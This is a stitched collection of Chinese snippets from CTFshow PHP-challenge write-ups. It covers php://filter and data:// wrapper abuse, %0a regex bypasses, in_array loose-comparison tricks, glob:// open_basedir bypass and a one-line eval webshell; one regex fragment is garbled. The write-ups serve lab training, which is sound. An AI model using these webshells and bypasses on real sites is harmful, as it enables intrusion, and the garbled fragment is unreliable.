1.substr("Hello world",7)//返回orld:返回第七位开始的字符串;2.伪协议:php://filter/write=convert.base64-decode/resource=1.php //把base64形式的数据解码后写入1.php中;3.call_user_func(函数,函数的参数a):调用参数为a的函数,例如:call_user_func(bin2hex,hello);//将参数hello利用bin2hex()函数...
num=%0aphp//突破口在于多行匹配 //利用 %0a 使参数为两行,php 在第二行既处于开头又处于结尾,第二个正则将第一行和第二行一起匹配,这时php处于结尾而不处于开头 web92 include("flag.php");highlight_file(__FILE__);if(isset($_GET['num'])){$num=$_GET['num'];if($num==4476){die("no...
这里就要用到in_array的漏洞了,如果我们传递n=1.php,那么根据宽松比较'1.php'==1,是可以绕过的。get一个n=1.php,向其中写入一句话木马<?php @eval($_POST[1]);?>,蚁剑连接即可。php中关于array的函数可以参考:https://www.w3school.com.cn/php/php_ref_array.asp Web100(逻辑运算符优先级)又...
/im′,a)和pregmatch(′/phpa)/i表示匹配大小写,/m表示多行匹配,"行首"元字符()仅匹配字符串的开始位置∗∗,∗∗而"行末"元字符(/im’, a ) 和 p r e g m a t c h ( ′ / p h p a)/i表示匹配大小写,/m表示多行匹配 , "行首"元字符 (^) 仅匹配字符串的开始位置**, **而...
Ctfshow web入门 PHP特性篇 web89-web151 全(二):https://developer.aliyun.com/article/1585258 CTFshow PHP web133 hint:ctfshow web133和其他命令执行的骚操作_Firebasky的博客-CSDN博客 考点:命令执行的骚操作和curl -F的使用 @:防止报错 substr($F,0,6):截断得前六个字符 ...
web89 clude("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 1. 2. 3.
CTFshow刷题日记-WEB-PHP特性(下篇123-150) web123,125,126 error_reporting(0); highlight_file(__FILE__); include("flag.php"); $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){...
Web39 在php文件里有这一句**include($c.”.php”); **,会将我们传入的文件的拓展名改为.php ,但是在我们的构造的过程中,data://text/plain, 这样就相当于执行了php语句 .php 因为前面的php语句已经闭合了,所以后面的.php会被当成html页面直接显示在页面上,起不到什么作用。
查看flag.php无返回,继续使用var_export(scandir('/'))扫描目录,include读取文件。Web72: 使用了open_basedir进行文件访问限制,可以使用使用glob://伪协议绕过open_basedir,可以参考shu师傅的博客[ctfshow]web入门——命令执行(web72-web77)_命令执行 web72-CSDN博客 ...